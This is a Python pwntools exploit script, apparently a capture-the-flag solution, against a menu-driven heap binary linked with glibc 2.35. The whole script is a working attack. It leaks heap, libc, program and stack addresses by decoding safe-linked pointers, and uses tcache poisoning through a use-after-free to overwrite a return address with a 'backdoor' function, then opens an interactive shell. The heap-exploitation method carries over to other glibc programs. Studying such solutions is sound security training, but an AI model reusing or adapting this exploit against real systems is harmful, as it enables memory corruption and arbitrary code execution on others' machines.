from
pwn
import
*
elf
=
ELF(
"./pwn"
)
libc
=
ELF(
"./libc-2.35.so"
)
ld
=
ELF(
'./ld-2.35.so'
)
p
=
process([elf.path])
context(arch
=
elf.arch, os
=
elf.os)
context.log_level
=
'debug'
def
add_chunk(size):
p.sendlineafter(b
"edit\n"
, b
"1"
)
p.sendlineafter(b
"choose?\n"
, b
"1"
)
p.sendlineafter(b
"size:"
,
str
(size).encode())
def
delete_chunk():
p.sendlineafter(b
"edit\n"
, b
"2"
)
def
show_chunk():
p.sendlineafter(b
"edit\n"
, b
"3"
)
def
edit_chunk(content):
p.sendlineafter(b
"edit\n"
, b
"4"
)
p.sendafter(b
"data:"
, content)
def
decrypt():
p.recvuntil(b
"the data:"
)
enc
=
bytearray(p.recv(
7
))
for
i
in
range
(
7
):
enc[i] ^
=
(i
+
153
)
return
bytes(enc)
add_chunk(
0x88
)
delete_chunk()
show_chunk()
heap_base
=
u64(decrypt().ljust(
8
, b
'\x00'
)) <<
12
success(
"heap_base = "
+
hex
(heap_base))
add_chunk(
0x418
)
p.sendlineafter(b
"edit\n"
, b
"1"
)
p.sendlineafter(b
"choose?\n"
, b
"2"
)
delete_chunk()
show_chunk()
libc_base
=
u64(decrypt().ljust(
8
, b
'\x00'
))
-
0x242ce0
+
0x50000
libc.address
=
libc_base
environ
=
libc.sym[
'environ'
]
success(
"libc_base = "
+
hex
(libc_base))
success(
"environ = "
+
hex
(environ))
add_chunk(
0x88
)
delete_chunk()
p.sendlineafter(b
"edit\n"
, b
"5"
)
p.recvuntil(b
"address: "
)
backdoor
=
int
(p.recv(
14
),
16
)
elf_base
=
backdoor
-
0x12be
success(
"elf_base = "
+
hex
(elf_base))
success(
"backdoor = "
+
hex
(backdoor))
p.sendafter(b
'data:'
, p64(
0
)
+
p64(
0
))
delete_chunk()
target
=
heap_base
+
0x10
edit_chunk(p64(heap_base >>
12
^ target))
add_chunk(
0x88
)
add_chunk(
0x88
)
delete_chunk()
edit_chunk(p64(
0
))
add_chunk(
0x18
)
delete_chunk()
add_chunk(
0x28
)
delete_chunk()
add_chunk(
0x288
)
delete_chunk()
edit_chunk(p16(
2
)
+
p16(
2
)
+
p16(
0
)
+
p16(
0
))
add_chunk(
0x18
)
delete_chunk()
edit_chunk(p64((heap_base >>
12
) ^ environ))
add_chunk(
0x18
)
add_chunk(
0x18
)
show_chunk()
stack_addr
=
u64(decrypt().ljust(
8
, b
'\x00'
))
success(
"stack_addr = "
+
hex
(stack_addr))
add_chunk(
0x28
)
delete_chunk()
target
=
elf_base
+
0x4040
edit_chunk(p64((heap_base >>
12
) ^ target))
add_chunk(
0x28
)
add_chunk(
0x28
)
target
=
stack_addr
-
0x140
edit_chunk(p64(target))
edit_chunk(p64(backdoor
+
8
))
p.interactive()